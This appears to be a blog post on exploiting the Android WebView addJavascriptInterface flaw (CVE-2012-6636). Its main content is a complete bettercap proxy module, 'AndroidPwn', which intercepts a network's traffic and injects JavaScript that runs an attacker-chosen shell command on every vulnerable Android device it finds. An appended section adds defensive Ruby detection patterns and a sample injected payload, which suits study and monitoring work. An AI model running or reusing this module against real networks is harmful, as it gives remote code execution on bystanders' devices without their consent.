Recently I've been playing with Android's WebView-based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability (CVE-2012-6636), which affects every device running a version older than Android 4.2.
There's an excellent post about this vulnerability; long story short, if an app uses a WebView UI control and declares a custom JavaScript interface for it like so:
import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebView;

public class WebViewGUI extends Activity {
    WebView mWebView;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        mWebView.getSettings().setJavaScriptEnabled(true);
        // On Android < 4.2 every public method of this object, and through
        // reflection the whole Java runtime, is reachable from page JavaScript.
        mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
        mWebView.loadUrl("file:///android_asset/www/index.html");
        setContentView(mWebView);
    }

    final class JavaScriptInterface {
        JavaScriptInterface() { }

        public String getSomeString() {
            return "string";
        }
    }
}
you can inject some special JavaScript into that page and make that device execute any shell command you want.
In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap; for this purpose I've written the AndroidPwn transparent proxy module.
class AndroidPwn < BetterCap::Proxy::Module
  @@command = nil
  # JavaScript appended to every matching HTML response; the command array is
  # filled in from the --command option below.
  @@payload = "<script>\n" +
              "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
              "for(i in top) {\n" +
              "  try {\n" +
              "    top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(command);\n" +
              "    break;\n" +
              "  }\n" +
              "  catch(e) {}\n" +
              "}\n" +
              "</script>"

  def self.on_options(opts)
    opts.separator ""
    opts.separator "AndroidPwn Proxy Module Options:"
    opts.separator ""
    opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
      @@command = v.strip
      # Escape single quotes so the command survives inside the JS string literal.
      @@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
    end
  end

  def initialize
    raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
  end

  def on_request( request, response )
    if is_exploitable?( request, response )
      BetterCap::Logger.info ""
      BetterCap::Logger.info "Pwning Android Device :".red
      BetterCap::Logger.info "  URL   : http://#{request.host}#{request.url}"
      BetterCap::Logger.info "  AGENT : #{request.headers['User-Agent']}"
      BetterCap::Logger.info ""
      response.body.sub!( '</head>', "</head>#{@@payload}" )
    end
  end

  private

  # Only HTML 200 responses requested by an Android WebKit user agent are touched.
  def is_exploitable?(req,res)
    req.headers.has_key?('User-Agent') and \
    req.headers['User-Agent'].include?("Android") and \
    req.headers['User-Agent'].include?("AppleWebKit") and \
    res.content_type =~ /^text\/html.*/ and \
    res.code == '200'
  end
end
As you can see, you just need to activate it and specify a --command COMMAND command line argument and you're ready to go. Leave it running and it will automatically perform a Man-In-The-Middle attack on your network and execute the command(s) you've chosen on every single Android device it finds on the network.
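As an added defender-side example (not part of the original post or of bettercap), the following Ruby checks do the inverse of the module above: they flag HTML responses that carry the reflection chain the payload relies on, and they inventory WebView user agents whose Android release predates 4.2, so a monitoring proxy or IDS can alert on either. The page bodies and user agents at the bottom are constructed samples.

```ruby
# Each indicator is one building block of the reflection chain; requiring
# several of them together keeps false positives on ordinary pages low.
BRIDGE_ABUSE_INDICATORS = [
  /getClass\(\)\s*\.\s*forName\(\s*['"]java\.lang\.Runtime['"]\s*\)/i,
  /getMethod\(\s*['"]getRuntime['"]/i,
  /\.invoke\(\s*null\s*,\s*null\s*\)/,
  /\.exec\(/,
  /for\s*\(\s*\w+\s+in\s+(top|window)\s*\)/
].freeze

# Number of indicators present in an HTML response body.
def bridge_abuse_score(html)
  BRIDGE_ABUSE_INDICATORS.count { |re| html =~ re }
end

# Alert when at least `threshold` indicators co-occur in one body.
def bridge_abuse?(html, threshold: 3)
  bridge_abuse_score(html) >= threshold
end

# Android release from a User-Agent, e.g. "Android 4.1.2" -> [4, 1, 2]; nil if absent.
def android_version(user_agent)
  m = user_agent.match(/Android\s+(\d+(?:\.\d+)*)/)
  m && m[1].split('.').map(&:to_i)
end

# True for a WebKit-based (WebView) User-Agent on Android < 4.2, the population
# affected by CVE-2012-6636; other browsers on the same device are not flagged.
def legacy_webview?(user_agent)
  return false unless user_agent.include?('AppleWebKit')
  v = android_version(user_agent)
  !v.nil? && (v <=> [4, 2]) < 0
end

# Constructed samples for a self-check (not captured traffic).
INJECTED_PAGE = "<html><head></head><script>var command=['/system/bin/sh','-c','id'];" \
  "for(i in top){try{top[i].getClass().forName('java.lang.Runtime')" \
  ".getMethod('getRuntime',null).invoke(null,null).exec(command);break;}catch(e){}}</script></html>"
CLEAN_PAGE = "<html><head><title>Hi</title></head><body><script>document.title='ok'</script></body></html>"
OLD_WEBVIEW_UA = "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; ExampleDevice Build/TEST) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
NEW_WEBVIEW_UA = "Mozilla/5.0 (Linux; Android 4.4.2; ExampleDevice Build/TEST) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Mobile Safari/537.36"

if __FILE__ == $0
  puts "injected page flagged: #{bridge_abuse?(INJECTED_PAGE)} (score #{bridge_abuse_score(INJECTED_PAGE)})"
  puts "clean page flagged:    #{bridge_abuse?(CLEAN_PAGE)}"
  puts "legacy WebView UA:     #{legacy_webview?(OLD_WEBVIEW_UA)}"
end
```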
Source: Evilsocket